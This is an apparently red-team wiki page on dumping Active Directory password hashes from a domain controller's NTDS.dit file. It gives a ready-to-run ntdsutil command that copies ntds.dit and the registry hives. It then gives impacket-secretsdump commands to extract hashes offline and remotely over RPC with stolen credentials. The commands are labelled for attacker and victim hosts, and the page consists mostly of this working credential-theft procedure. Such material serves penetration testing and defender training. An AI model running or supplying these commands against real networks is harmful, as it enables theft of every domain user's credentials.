| description |
|---|
Dumping NTDS.dit with Active Directory users hashes |
If you have no credentials, but you have access to the DC, it's possible to dump the ntds.dit using a lolbin ntdsutil.exe:
{% tabs %} {% tab title="attacker@victim" %}
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"{% endtab %} {% endtabs %}
We can see that the ntds.dit and SYSTEM as well as SECURITY registry hives are being dumped to c:\temp:
We can then dump password hashes offline with impacket:
{% tabs %} {% tab title="attacker@local" %}
root@~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local{% endtab %} {% endtabs %}
If you have credentials for an account that can log on to the DC, it's possible to dump hashes from NTDS.dit remotely via RPC protocol with impacket:
impacket-secretsdump -just-dc-ntlm offense/[email protected]
{% embed url="https://adsecurity.org/?p=2362" %}
{% embed url="https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-\(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM\)/" %}